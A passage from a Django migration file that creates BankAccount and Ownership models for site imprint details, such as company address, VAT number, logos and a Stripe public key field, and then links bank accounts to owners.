                ('number', models.CharField(blank=True, max_length=42, verbose_name='Number')),
                ('bic', models.CharField(blank=True, max_length=11, verbose_name='BIC')),
                ('currency_code', models.CharField(default='CHF', max_length=3, verbose_name='Currency ISO code')),
            ],
        ),
        migrations.CreateModel(
            name='Ownership',
            fields=[
                # OneToOne to sites.Site doubles as the primary key
                ('site', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='sites.Site')),
                ('company_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Company name')),
                ('company_department', models.CharField(blank=True, max_length=50, verbose_name='Company department')),
                ('first_name', models.CharField(blank=True, max_length=30, null=True, verbose_name='First name')),
                ('last_name', models.CharField(blank=True, max_length=30, null=True, verbose_name='Last name')),
                ('email', models.EmailField(max_length=254, verbose_name='Email')),
                ('street', models.CharField(max_length=100, verbose_name='Street')),
                ('postal_code', models.CharField(max_length=100, verbose_name='Postal code')),
                ('place', models.CharField(max_length=100, verbose_name='Place/City')),
                ('country_code', models.CharField(default='CH', max_length=2, verbose_name='Country code')),
                ('country_name', models.CharField(default='Switzerland', max_length=100, verbose_name='Country')),
                ('phone', models.CharField(blank=True, max_length=32, null=True, verbose_name='Phone')),
                ('fax', models.CharField(blank=True, max_length=32, null=True, verbose_name='Fax')),
                ('vat_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='VAT number')),
                ('logo', models.ImageField(blank=True, null=True, upload_to='ownership', verbose_name='Logo')),
                ('logo_invoice', models.ImageField(blank=True, null=True, upload_to='ownership', verbose_name='Logo invoice')),
                ('stripe_public_key', models.CharField(blank=True, max_length=32, null=True, verbose_name='Stripe public key')),
            ],
        ),
        # Added after both CreateModel ops so the target model exists;
        # 'imprint.Ownership' is an app-local reference, hence no extra dependency
        migrations.AddField(
            model_name='bankaccount',
            name='owner',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bankaccounts', to='imprint.Ownership'),
        ),
    ]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.